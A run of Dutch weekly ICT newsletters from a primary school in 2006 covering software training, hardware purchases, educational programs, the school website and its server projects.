++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 12 - 2006 (24 maart)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

S@S EN TECHNIKA10

Doordat de dames van technika10 allerlei vragen stelden over S@S, is deze nieuwsbrief in het geel. In de editor (de tekstverwerker van S@S) zit een tabelfunctie. Daarmee kun je de achtergrond van een pagina gemakkelijk een kleurtje geven. Met de html-codes erbij zijn er veel mogelijkheden. De gele kleur is met een "color picker" gekopieerd van de gele balk in het logo.

ICT LEERLIJN IN DE MIDDENBOUW

Deze week hebben we de leerlijn in de groepen 3, 4 en 5 onder de loep genomen. Er is afgesproken, dat in groep 5op de dinsdagmiddag gewerkt gaat worden aan de tekstverwerkingsvaardigheden. Karin zal een helpende hand bieden als opstart.

KRUK en BEAMER

De kruk van de BIC van week 5 bevalt goed. Volgende week bestellen we er meer.
Ook zullen we dan een beamer bestellen.

IMPRESS versus POWERPOINT

a.s. Maandag zal de cursus powerpoint overgaan in Open Office (IMPRESS). We zijn erg benieuwd of de leerkrachten het verschil zullen merken.

Site@School 

Deze weken heeft het S@S team gesprekken gevoerd met Richard. Hij is geinteresseerd in ondersteuning van scholen die zelf niet zo handig zijn met S@S. Hij denkt aan een soort betaalde helpdesk functie voor hulp bij installatie, updaten, patchen, gebruikersvragen, etc. Scholen zouden voor een gering bedrag per maand daarvan gebruik kunnen maken. Dat zou het Forum zeer ontlasten en lijkt alleen daaarom al een aanrekkelijk idee.

Karin geeft S@S les op de Corantijn. De leerkrachten maken kennis met het systeem en zijn zeer enthousiast. Binnenkort krijgen de leerlingen van groep 7 en 8 instructie hoe ze hun klassenpagina moeten maken op het internet.

ServerAtSchool

De installatie gids en de gebruikershandleiding zijn bijna af. We hopen dat we voor het eind van de maand het project hebben afgerond. 't Werd tijd!

We hadden verder een zeer rustige week. Alles doet het.

groeten en prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-03-29 w13

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 13 - 2006 (31 maart)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ICT en BEVO (beeldende vorming)

Onze BEVO-leerkracht heeft een schitterend plan uitgevoerd. Het is nog niet klaar. Ze heeft kinderen uit groep 8 kleifiguren laten maken. Daarna hebben ze in groepjes van 3 een verhaal verzonnen, een decor gemaakt en met de schoolcamera daar foto's van gemaakt. Die foto's komen op de site met de tekst erbij. Hoe, dat bekijken we nog. Maar nu mag u alvast even stiekum kijken. Om dat allemaal te kunnen doen is Carolina hard aan het oefenen met foto's op de site te zetten.

CONGRES ICT en INSPIRATIE

Deze week was er door de Hogeschool INHolland een congres in Haarlem georganiseerd. Natuurlijk lieten we n
iet verstek gaan bij zo'n titel. Er moesten drie workshops gekozen worden uit een aanbod van 20. En dat is natuurlijk niet eenvoudig. Veel inspiratie niet opgedaan. Maar de grootste boodschap die over is gekomen: "De ICT coördinator moet veel meer een coachende rol hebben. Daarbij is het van belang dat de ICT coördinator een bepaalde gesprekswijze hanteert bij het omgaan met collega's die ICT niet zo hoog hebben zitten. Veel blijven ondersteunen bij het uitvoeren van de opdrachten". Iemand uit het publiek zei: "ja maar, dan blijven ze maar op je rekenen" Lezers: u ziet het: er is nog veel werk te doen.

AFSPRAKEN LEERLIJN

Er staan nog wat scholingen en afspraken mbt onze leerlijn op de "rol". Het volgende is er deze week gedaan en afgesproken:

DIGIWIJZER

In groep 6 werd met Digiwijzer verder gewerkt. Eén opdracht mislukte, omdat automatisch de browser FIREFOX werd geopend. Als je met je rechter muisknop op een plaatje klikt bestaat de mogelijkheid niet "afbeelding afdrukken". Dus zal er een aanpassing moeten worden verricht. Namelijk: standaard de browser op Internet Explorer zetten. Helaas.

POWERPOINT <-> IMPRESS

Tijdens de cursus leek de openoffice versie van powerpoint geen problemen op te leveren. Het is nog even zoeken naar de lay-out van een dia. Bijna hadden we een beamer besteld, maar op het laatste nippertje durfden we toch weer niet, nadat we van Jan van de onderwijsbegeleidingsdienst wat informatie kregen.

LEERSTIJLENTEST

Op het ICT congres gedaan: de leerstijlentest (online) Probeer het zelf ook eens.

NIPO ENQUETE

Deze week werd de school gebeld voor een telefonische enquete over het ICT gebruik binnen de school. Tja, er werd gevraagd naar een leerkracht met als beginletter van de achternaam een A. Als die nou net ook de ICT coördinator is, dan komen er natuurlijk andere antwoorden dan wanneer het geen ICT coördinator is.

POLSSTEUN

Een van onze leerkrachten heeft een anti RSI polssteun op proef. Ze is erg enthousiast en heeft wat suggesties gegeven aan de firma. Er zal iets worden aangepast, waardoor ze de steun nog een paar weken langer op proef mag houden.

BERENPROJECT

De groepen 4 van De Opslach en de Rosaboekdrukker zijn druk aan het mailen. Vandaag is Snuffie mee geweest naar de gymzaal. De foto's ervan komen dit weekend op de site.

PRINTERS

Dinsdag 11 april komt iemand de printer nakijken die de achterkant van het papier grijzig maakt.

BEZOEK UIT BELGIË

Wij kregen Kurt op bezoek. Hij is bovenschools ICT'er voor een aantal basisscholen te Eeklo, enthousiast S@S gebruiker en onderhoudt http://www.digitaleschool.be/ . Deze site is een goudmijn aan ideeën, lesvoorbeelden, handleidingen, etcetera. Op vakgebieden van Rekenen en taal tot en met muziek, handenarbeid en godsdienst; van kleuters tot groep 8.
Wat ons opviel bij onze zuiderburen: ze hebben minder geld voor ICT en buiten dat meer uit. Bijvoorbeeld: nog veel 486's maar wel daarmee pm3's maken met leerlingen. Een onverbiddelijke aanrader deze site.
We hadden elkaar veel te vertellen over onze ICT avonturen. Eeklo lijkt een goede uitwisselingspartner voor een Berenproject. Welke Nederlandse scholen hebben zin?

SERVERATSCHOOL

De documentatie is af! Maar nog net niet beschikbaar. We willen er nog een native speaker naar laten kijken. Je kunt nu eenmaal als Nederlanders niet als Engelsen schrijven. Maar, naar het zich laat aanzien, volgende week komt de sneak preview waar jullie zo smartelijk lang op hebben zitten wachten.

SITEATSCHOOL

Nog twee maanden, dan komt de nieuwe 2.4 versie uit. Af en toe vinden de mensen die de beta testen nog een bug(je).

Poeh, het is al laat. Maar de BIC is er weer.

Groeten en een prettig weekend!
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-04-06 w14

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 14 - 2006 (7 april)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

SPELFOUT

Vorige week stond er een spelfout in de BIC: stiekum ipv stiekem. Gelukkig biedt dan het online magazine van ONZE TAAL weer uitkomst. Er werd namelijk vorige week gepubliceerd, dat er een BLAUW spellingboekje is/komt.
Als die spellingregels worden gehanteerd dan mag stiekum vast ook. Een greep uit de nieuwe regels:

-d/t regel: nooit t na d: jij word, hij word, hij rijd, hij houd
-nooit tussen-n: kippeei, pannekoek, paardebloem, ideeeloos
-Engelse woorden in gedeeltelijk Engelse spelling: gedelete, geskate, geemaild
-geen apostrof: smsen, msnen
-altijd k ipv c: aktie, produktie
-nooit hoofdletters behalve aan begin van de zin: engelse taal, vwo, havo
-geen diacritische tekens, zoals trema's e.d.: vwoer, ideeeloos, appel, kanoen
-alleen komma's in de zin, geen puntkomma's e.d.
-samenstellingen altijd aan elkaar: 24uurseconomie, vutpremie
-ook Engelse samenstellingen: online, offscreen

Wie meer wil weten kijkt hier

BERENPROJECT

Beer Snuffie is al weken bij ons. Hij is helemaal vies geworden van het logeren, ondanks dat hij -volgens de kinderen- heel vaak doesjt (zijn tanden zijn ondertussen ook superschoon). Volgende week gaan de beren weer terug naar hun eigen klas. Knotje komt terug in de Rosa Boekdrukker en zal vast ook daar warm onthaald worden door veel kinderen. De smaak zit erin.
Alle emails zijn te lezen onder de foto's van de kinderen.

LETTERPRET

Met het EDEX-bestand uit ESIS (=alle namen van leerlingen uit ons administratieprogramma) zijn de kinderen van de kleuterbouw weer ingevoerd in de nieuwe versie van ....ja..... ja....Letterpret. Tegelijkertijd worden dan meteen alle leerlingen van de hele school ingevoerd in de programma's van Malmberg. Dus ook in Maatwerk (remediërend rekenprogramma). We wachten af. We zullen zien.
Een hele belevenis, dat importeren van een EDEX bestand, als je dat voor het eerst doet. Zo gepiept, wel onder wakend oog van de meester (Dirk).

BESTELLINGEN

We hebben 34 krukken besteld en een beamer. De krukken komen volgende week, de beamer, als de betaling binnen is. De krukken zijn getest en goed bevonden. Bij de keuze van krukken zijn we ervan uitgegaan, dat leerlingen niet langer dan een half uur achter elkaar erop zitten. De steol van Galvanitas viel af, omdat hij niet hoog genoeg kon. Onze werkbladen zijn namelijk nogal hoog.

HET BOEKDRUKKERTJE

Vandaag is ook onze nieuwsbrief aan de ouders weer nieuw leven ingeblazen. De nieuwsbrief zal tweewekelijks worden verspreid. Ouders en andere belangstellenden kunnen zich aanmelden voor deze nieuwsbrief.

GOOGLE

Vorige week in het programma Zembla werd een angstaanjagend verhaal over Google zijn werkwijze verteld. Is er een alternatieve zoekmachine? Vanavond in het programma "de leugen regeert" zal het Zembla item onderuit gehaald worden. We zijn benieuwd.

OEIOEI!!

Boze lezers bestookten de redactielokalen van de BIC met mail en telefoon. In het vorige nummer schreven wij dat wij, omdat één specifiek programma (Digiwijzer) om Internet Explorer vraagt, maar meteen IE als standaardbrowser in te stellen. Kern van de reacties: Zoek een goede oplossing om met Digiwijzer te doen wat je moet doen _en_ Firefox te gebruiken.
Lezer Dennis kwam met de volgende suggestie: Met Menu Bottons 1.16 kun je een iconenbalk toevoegen waardoor je vele extra functies krijgt. Zie hier.
Een prima suggestie voor wie geen moeite heeft met de extra ruimte die de balk op de desktop inneemt. Naar aanleiding van Dennis' suggestie ging de redactie op- zoek en vond ook nog: Image Toolbar. Zie hier. Kost geen ruimte want er verschijnt een popup menu bij foto's, net zoals dat bij IE gebeurt. Er zijn echter minder functies beschikbaar dan bij Menu Buttons. We danken de lezers voor hun reacties.

SERVERATSCHOOL

Vorige week beloofden we jullie een sneak preview van de documentatie van ServerAtSchool. Welu, het is zover. ZIE HIER. Peter en Dirk zijn blij dat het af is. Dirk beweert dat er geen soortgelijk project bestaat dat zo goed en volledig gedocumenteerd is als ServerAtSchool. Hm, lezers...

groeten en prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-04-10 w15

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 15 - 2006 (14 april)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

NIEUWE MUIS VOOR GERDA

In het kader van ANTI-RSI test collega Gerda voor het bedrijf "ergonomique" een muismat. Ze heeft nu ook een nieuwe muis aangeschaft. Een enorm gevaarte. U gelooft uw ogen niet! Het is een trackball in plaats van een muis. We hebben 't zo ingericht dat je met muis èn trackball kan werken. De trackball in de USB poort en de muis in de ps/2 poort. Ze werken beide, zodat een ander ook nog kan werken aan die computer.

KRUKKEN

De krukken zijn binnen. Ze staan nu overal in de school bij de computers. Misschien bestellen we nog bij, voor de kleuters.

BEAMER

Die is ook gekomen. Echt een hele snelle bezorging. 's Ochtends kregen we een mail, dat hij was verzonden en 's middags was hij op school. Nu kunnen we hem gebruiken aanstaande dinsdag bij onze evaluatiedag. Het pasgeleerde Impress (powerpoint) komt dan mooi van pas. De beamer is een Epson EMP S3. Gekozen, omdat een school in de buurt er ook zo één heeft en die werkt goed (ook overdag) Was ook niet zo verschrikkelijk duur. Inclusief btw € 702.-.

KLANKIE

Ook hebben we 3 Klankie toetsenborden gekocht. Die moeten een steun zijn in het aanvankelijk leesproces. Eén komt er in de groep oudste kleuters. De ander twee in de groepen 3. Kijk op de Kijk op de site Ook deze bestelling was snel in huis: in twee dagen.

DIGIWIJZER

Groep 6 was druk bezig met het programma Digiwijzer (programma om te leren zoeken  op het internet tbv een werkstuk of spreekbeurt). Een opdracht op de site van Taptoe ging niet zoals beschreven in de opdrachten voor de kinderen WANT..... de site van Taptoe is vernieuwd! Nu hebben we de vraag gesteld aan de makers van Digiwijzer of ze Digiwijzer bijwerken. Zoniet, dan willen we graag de bestanden, zodat we het zelf kunnen bijwerken. En als dat niet lukt, dan moeten we op zoek naar een alternatief.
Niets is zo frustrerend als een programma dat niet klopt.

OMRUIL COMPUTERS

Bij de partij computers die we van ARCOM IT kochten zat 1 verkeerde. Die ruilden we om en namen 'm binnen 10 minuten op in het netwerk (inclusief image terugzetten!). Een werkje van niks dankzij ServerAtSchool's SABRINE (Semi Automatic Backup and Restore in a Network Environment)

IMAGE UPDATEN

Er ligt zo langzamerhand een waslijst van zaken die in het image bijgewerkt moet worden. Software moet erbij, verschillend eUSB sticks, de eerder genoemde trackball, aanpassingen in OOo; veel werk voor Peter.

Maar nu eerst: een zaalich pasen
groeten van Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-04-19 w16

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 16 - 2006 (21 april)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

SITE met veel links - tip voor de collega's op de Rosa Boekdrukker

Bij ons op school zijn we bezig met "klassenmanagement".  We leren de gang van zaken in onze klassen beter te organiseren, zodat we meer tijd overhouden om kinderen op twee niveaus te instrueren. De leerlingen lossen meer zaken zelstandig op. Dit komt het ICT gebruik ook ten goede. Doordat er een bericht binnenkwam van de Stichting Ict op School over de Kennisrotonde Klassenmanagement en wij op die site gingen lezen, kwamen we de volgende site ook tegen. Vol met handige tips.

STUDIEDAG

Afgelopen week werd tijden een studiedag ICT geëvalueerd. Voor het eerst werd de beamer gebruikt. Daarbij werd zowel Powerpoint als Impress gebruikt om de werk van de kinderen te tonen. De twee programma's konden prima door elkaar gebruikt worden tijdens de voorbereiding. Helaas was de presentatie niet compleet, doordat de website bij de voorbereiding uit de lucht was. (zie verderop)
De stand van zaken werd doorgenomen...................................
De leerkrachten moesten een evaluatieformulier invullen. Graag inleveren voor de meivakantie in de envelop op het prikbord!

DIGIWIJZER - VERVOLG

Antwoord op onze vraag of Digiwijzer wordt bijgewerkt:
"Dank voor uw mail. Spelfouten, taalfouten en pagineringsfouten in Digiwijzer zijn nu verbeterd, maar Digiwijzer is niet up to date gemaakt. Wij kunnen u dergelijke bestanden jammer genoeg niet geven. U krijgt wel via uw schoolbegeleider kosteloos de bijgewerkte versie van de kopieerbladen, die recent klaar is. Aan de cd–rom is verder niets veranderd. Dank voor uw medewerking aan Digiwijzer."
Tja, dat zet weinig zoden aan de dijk, als de websites waarnaar de opdrachten verwijzen veranderen!

BEREN PROJECT AFGELOPEN

Vandaag kwam onze beer terug uit Franeker. Kijk, wat mooi ingepakt. Er zaten friese koekjes bij Knotje in de doos. Die smaakten naar anijs. Knotje is nu met een kind mee logeren (ze hebben de smaak te pakken). We zijn benieuwd hoe het met Snuffie gaat.

DATABANK OpenOffice OPDRACHTEN

We zijn aan het kijken of we met de nederlandstalige OpenOffice enthousiastelingen een databank met opdrachten voor kinderen kunnen maken. Zodat ze èn met taal èn met handig tekstverwerken bezig zijn. U hoort hier vast meer over.

STROOMSTORING

In het paasweekend hadden we in school een dikke stroomstoring. Die heeft blijkbaar zo lang geduurd at ons UPS (Uninterupted Power Supply) de onderbreking niet heeft kunnen opvangen. Daardoor was onze server Zaterdagmiddag, Zondag en Maandag niet bereikbaar. Dinsdagochtend hoefden we 'm gelukkig alleen maar te herstarten.

SITE@SCHOOL

Half mei komt de nieuwe versie uit. De voornaamste veranderingen zijn
1. nieuwe editor. (met word strip functie)
2. Multiple file upload (dan hoef je o.a. niet meer foto voor foto aan te klikken)
En verder veel kleine verbeteringen. Dat belooft wat!

SERVERATSCHOOL

Nu de documentatie af is kunnen we onze aandacht weer gaan richten op het gewone werk. Er is weer ruimte voor een paar nieuwe klanten. Kijk op de site van ServeropSchool De gebruikersvereniging van scholen die ServerAtSchool gebruiken, STRICT (Scholen Tezamen Rijk met ICT), komt langzaam dichterbij. We zijn de laatste notariële hobbels aan het nemen.

groeten en prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-04-28 w17

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 17 - 2006 (28 april)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

SCHOLINGEN REMEDIËRENDE SOFTWARE

Deze week vonden er twee scholingen voor educatieve software plaats. We begonnen maandag met het programma Maatwerk. We hadden wat problemen met de werking van de programma's. De registratie van wat de leerlingen doen liep niet goed. Er blijken "patches" voor het programma te zijn. Echter, een telefoontje naar de helpdesk leerde, dat de patches niets te maken hebben met het niet kunnen registreren. De scholing is nog niet afgerond. De vragen die we tussentijds hebben kunnen we voorleggen aan onze begeleider. De eerste is er al: hoe interpreteer je het resultaat van een instaptoets: leerling scoort 59 % en er staat achter: goed. Is er een lezer van de BIC al ervaren met het programma? Dan horen wij dat graag.

De tweede scholing betrof het programma "leesladder". We hadden ons huiswerk braaf gedaan en uitdraaien van de resultaten in kleur geprint. We hebben die uitslagen bekeken en er conclusies uit getrokken en hebben geleerd hoe we zelf oefenstof kunnen selecteren. Ook hebben we besproken welke kinderen in aanmerking komen om met het programma te werken. We benadrukken, dat een computerprogramma slechts één enkele manier van oefenen is. Zelf met een kind aan de slag gaan moet natuurlijk ook.

ZWIJSEN

Omdat wij nog steeds de versie 1.1 gebruiken van Veilig Leren Lezen en die op een paar afwijkende computers staan hebben we Zwijsen gebeld om nieuwe licenties. Die krijgen we - gratis. Daardoor kan het programma op dezelfde computers gezet worden als die we in de rest van de school gebruiken. Alleen zullen we ervoor moeten zorgen, dat die computers niet zo gemakkelijk een nieuw image kunnen krijgen, want anders raken we de licentiecodes kwijt.

SCANNER

Er moest een handgeschreven lijst gemaild worden naar het stadsdeel (ons bestuur). Even onder de scanner. Druk op de knop en lijst was gescand. Daarna als bijlage in de email. m.a.w : Onze nieuwe scanner gaat als een zonnetje. Het is een Canon (CanonScan Lide 25) kostte rond de € 70. Heeft alleen een usb aansluiting, dus je hoeft hem niet in een stopcontact te steken. Kan overal in elke klas even aan een computer worden gehangen. Welke leerkracht meldt zich aan?

BEAMER

Van de week de eerste les met een beamer gegeven. In groep 5 leerden de kinderen in Paint te kopiëren. Dirk heeft extra lange beeldschermkabels gekocht. De beamer werd op een groepstafel voor het bord gezet: een wandkaart diende als projectiescherm en vanachter een computer werd getoond wat ze moesten doen. Ze hebben meteen ook even geleerd hoe ze zelf kleuren kunnen aanpassen. Het werkte erg efficiënt. Er zijn prachtige werkstukken gemaakt.

IMAGE

Een computer op de 2e verdieping deed raar. Er kwam steeds een melding, dat hij afgesloten moest worden. Geen gezeur: bij opstarten even op de de toets met een "2" drukken en een nieuw image wordt opgehaald. Daarna geen klachten meer. Hoe simpel en wat een luxe!!!

NIEUWE SOFTWARE OP DE SERVER

Na de vakantie hebben we de lang verwachte programma's:
- IK TYP: Eindelijk kunnen we met de type lessen beginnen. Het drukken van de type Diploma's zal opgestart worden.
- Bas telt mee: een probeerversie van een rekenprogramma voor leerlingen van 4 tot 7 jaar. Misschien is het wat. Dat kunnen we nu 50x uitproberen.
- IK REKEN: de laatste versie; hierin kunnen de leerlingen met een EDEX bestand worden ingevoerd.
- Nijntje en het feest, een kleuterprogramma

Verder vele kleinigheden waaronder Sound Control zodat je met de Alt - en de Alt + toetsen het geluid zachter en harder kan zetten. "Mijn eerste Interactieve Woordenboek" eindelijk voor meerdere gebruikers tegelijkertijd bruikbaar, patches op de Maatwerk software, upgrades van Esis en Educat-B en nog wat kleinigheden.

Hiermee is de migratie van de oude Dellen naar de nieuwe tweedehands Compaqs voltooid, plus nog een heleboel extra's.

KLANKIE

De nieuwe Klankie toetsenborden kunnen niet in het netwerk. Jammer! We gaan ze bij de kleuters apart installeren. Een kleine tegenvaller, maar we denken dat we de zaak netjes kunnen oplossen.

PRINTERS

De printers van Stadstoezicht begonnen afdrukker te produceren die aan de achterkant grijs waren. Oorzaak: tonercartridges echt aan het einde van hun leven (ze waren nog van stadstoezicht). Verder 1 kleine reparatie en voor 75 Euri in totaal staan de printers er weer prima bij. De man van printeronderhoud zei dat de cartridges voor deze oude printers relatief veel goedkoper zijn dan cartridges voor de nieuwe generatie laserprinters.

KLOKHUIS

Heet van de naald: de nieuwe Klokhuis agenda kwam net binnen. Kijk of er onderwerpen bij zitten die aansluiten bij WoordenindeWeer!!!

groeten en prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-05-11 w19

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 19 - 2006 (12 mei)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Deze week vrijwel niets aan ICT kunnen doen. Karin moest voor de klas en had ook nog een adv-dag en Dirk had ook andere dingen te doen.

SCANNER

Deze week kwam voor het eerst de vraag uit het team: "hebben we een scanner?". Ja dus, wel twee. Neem maar even mee naar je klas, plug hem in en druk op de "scan" knop. Alles wijst zich vanzelf. Alles lukte. Ook het versturen als attachment loste de collega zelf op. Maar degene die het ontving kon maar één woord lezen. Wat blijkt: een scan is een foto. Als je die opent, kan het een hele grote afbeelding zijn. Dus kan het voorkomen, dat je maar één woord op je scherm ziet. Het hangt van het programma waarmee je afbeeldingen bekijkt af, hoe je het kunt zien. Wij werken hier op school met IrfanView. Om de hele afbeelding te zien, moet je op ENTER drukken. De scan was echt prima gelukt! De ontvanger moet waarschijnlijk bijgeschoold worden.

TELEBLIK

Nieuwe site met filmpjes voor het onderwijs. www.teleblik.nl Leerkrachten van onze school kunnen inloggen op ons intranet om wachtwoord en inlognaam voor onze school te vinden. In de begeleidende brief staat:

"Op 18 april heeft onderwijsminister Van der Hoeven Teleblik gelanceerd. Daarmee zijn duizende televisieprogramma's via www.teleblik.nl toegankelijk geworden voor het onderwijs. Het gaat o.a. om Polygoon- en NOSjournaals, Schooltv, Klokhuis, Andere tijden, Zembla, Willem Wever en nog veel meer."

Nu alleen even uitvlooien met welke speler het afgespeeld kan worden bij ons op school.

Problemen met inloggen op intranet?

Ga naar AANMELDEN (boven zoeken) en tik daar je wachtwoord en inlognaam in die je ook voor je email nodig hebt. Graag meteen even commentaar op de kleurstelling van het TEMPLATE op het intranet.

KLANKIE

Klankie toetsenborden (ZIE), worden bij ons als experiment ingezet in de kleutergroepen en in het begin van groep 3 als hulp bij het leesproces. De software is geïnstalleerd. We testten het door woorden in te tikken waarbij, als je het woord goed schrijft een plaatje verschijnt. Dirk tikte in: bril. Ja hoor, plaatje van een bril. Karin tikte in: poep. Ja, prima plaatje van, zo te zien een hondedrol. Vraag aan de trouwe lezertjes: welk woord tikte Karin toen in?

Groep 2 plus heeft nu zijn toetsenbord. Welke kleutergroep volgt? We zijn benieuwd naar ervaringen van Klankie gebruikers.

ZWIJSEN

We kunnen nog doorgaan met het gebruik van de oude versie van Veilig Leren Lezen. Ze doen niet moeilijk met het geven van nieuwe licentiecodes. Erg prettig geholpen. Prima helpdesk, die goed bijhoudr wat er in vorige gesprekken is afgesproken en toegezegd.

TEMPLATE EDITOR

In Site@School zit de module "template editor". Daarmee kunnen mensen het uiterlijk van hun eigen website maken. Welke titel, welke knoppen welke kleuren. Van alles kun je aanpassen. Bij onze website is dat template speciaal voor ons gemaakt en wij kunnen er niet gemakkelijk iets aan veranderen. Maar als je nu een verse versie van S@S downloadt om een nieuwe website zelf te starten, kun je van alles uitpoberen. Dat is wat Karin in de meivakantie en deze week heeft zitten uitdokteren -in het intranet- met de prima geschreven handleiding van Dirk.
Voor mensen die kunnen inloggen op ons intranet: neem een kijkje en geef suggesties voor een betere kleur. Voor mensen die zelf willen experimenteren: Dirk heeft speciaal een testsite. Daar lees je met welke gegevens je moet inloggen. Wel eerst zorgen dat er in de adresbalk staat: http://wyxs.net/daily/starnet.

groeten en prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-05-15 w20

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 20 - 2006 (19 mei)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

PRINTER 2e VERDIEPING

Regelmatig zien we dat daar hele bomen in de vorm van bedrukt papier uit de printer komen. Telkens X weer hetzelfde. Dat komt door het ongeduld van de gebruikers. Iemand wil iets afdrukken en drukt op 'afdrukken'. Loopt vervolgens naar de printer. Daar ligt geen afdruk; logisch, de printer moet eerst opwarmen. Persoon loopt terug naar de computer, drukt weer op 'afdrukken'. Loopt weer naar de printer. Nog geen bedrukt papier te zien. Etc.

Het zou wellicht aanbevelenswaardig zijn als de gebruikers van de printer op de 2e verdieping iets geduldiger zijn bij het printen. Dat scheelt in de ontbossing van de wereld. Zeg het voort!

VEILIG LEREN LEZEN

Deze week hebben we de computers waar VLL nog op stond vervangen door computers die identiek zijn aan alle andere computers in de school. We hebben VLL op de server geïnstalleerd. En op de werkstations moesten licentiecodes worden ingevuld. Bij elke installatie belden we de helpdesk van Zwijsen voor een licentiecode. En snel dat het programma nu gaat!! Als een kind een plaatje aanklikt, vliegt het naar de juiste plaats.

LEESLADDER

Weer waren de gegevens van de leerlingen van groep 4 verdwenen. Gelukkig weer door middel van een back-up terug kunnen halen. We dachten eerst dat de kindern het doen door op "opslaan" te klikken in plaats van openen. Maar dat is niet zo. Heeft iemand anders dat ook? Weet iemand waar het door kan komen?

ONZE WERKSTATIONS

Nu Veilig Leren Lezen op onze nieuwe tweedehands werkstions draait hebben we nog maar één image te onderhouden. We hebben nog maar 1 afwijkende computer: de PC voor de TV in de hal waarop onze mededelingen vertoond worden. Die mededelingen zijn overigens ook bij jullie thuis te bekijken als je in het logo op onze website de derde pukkel (gele rechthoekje) van links aanklikt.

SITE@SCHOOL

versie 2.4 is deze week uitgebracht. Gefeliciteerd Fred!
In deze versie zitten een aantal grote verbeteringen waar de gebruikers naar smachttten:
- Verbeterde editor (Word documenten importeren, beter werken met plaatjes).
- Meerdere files tegelijk uploaden. Tot nu toe moesten we de files één voor één uploaden. Dat kost veel werk, bijvoorbeeld bij het vullen van een fotoalbum. Met deze feature zullen we binnenkort (nog) grotere harde schijven in de server nodig hebben!

Het S@S Development Team (Fred, Karin, Dirk) gaat binnenkort uit eten waarbij we evalueren en plannen smeden voor de volgende versie (mei 2007). Wordt het 2.5 of 3??

Groeten en prettig weekend,
Karin en Dirk

p.s. volgende week geen BIC ivm met de hemelvaart.

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-06-02 w22

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 22 - 2006 (2 juni)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

EDUCAT B

Deze week hebben we alle leerlingen ingevoerd in het bibliotheekprogramma EDUCAT B. We gaan nu beginnen om de boeken per computer uit te lenen. Dat gaan we met het bar-code systeem doen.
We kwamen er nog achter dat we een update-volgorde verkeerd hadden gedaan. We hadden meteen van versie 7 naar 9 ge-update en dat schijnt niet te mogen. Daardoor ontbreken er plaatjes in de nieuwste versie.

LEESLADDER

In groep 3 krijgen we rare meldingen bij het spelletje "QUIZ". Er wordt gezegd: "Kan niet voldoende opdrachten samenstellen".
De helpdesk bij Zwijsen vroeg ons het groepsbestand op te sturen om te kijken of zij de fout ook krijgen.
Niet dus.
En dus ook meteen weer : het zal wel aan jullie werkstation liggen.
Altijd wordt de bal teruggekaatst.

SITE@SCHOOL VERSIE 2.4

Deze week is ook onze website ge-update van versie 2.3 naar 2.4. We hebben nu de "SLIDESHOW" in ons fotoalbum. Je hoeft nu alleen achterover te gaan zitten kijken wat er allemaal vanzelf verschijnt.
Ook hebben we al meteen kunnen genieten van de nieuwe functie: "multiple file upload". Dat houdt in dat je niet elke foto apart hoeft up te loaden, maar in één keer een hele map ophaalt. Daar schuilt ook een groot gevaar: luiheid, niet meer eerst de foto's die echt leuk zijn selecteren. Eén collega haalde in één keer 120 foto's op. Dat ging goed. Maar toen hij in een volgende map meer dan 200 foto's ging uploaden, liep het vast. Logisch, zegt Fred, veel te groot bestand. Dus we moeten wel regels voor het uploaden en het selecteren en het eerst rechtop zetten van het aantal foto's gaan afspreken. Het eerst verkleinen van foto's door nieuwe gebruikers lukt goed. (deze opmerking naar aanleiding van een vraag in het forum)

XS4ALL

De woensdag voor Hemelvaart zijn we over gegaan van UPC (Priority/A2000) naar XS4ALL. Het gratis KPN aanbod. Er zijn nu nog aanpassingen nodig in de hosting van ons www.rosaboekdrukker.nl domein. We zullen meteen van deze verhuizing gebruik maken om het Siteatschool FORUM op een andere server te zetten. Ook zullen we een ander forum (software) gaan gebruiken en andere regels gaan hanteren voor het gebruik van het forum.
Het abonnement bij UPC zal dus binnenkort worden opgezegd. Volgens de papieren krijgen we dan de borgsom voor het modem terug.
We zijn benieuwd.

SITE@SCHOOL TOEKOMST

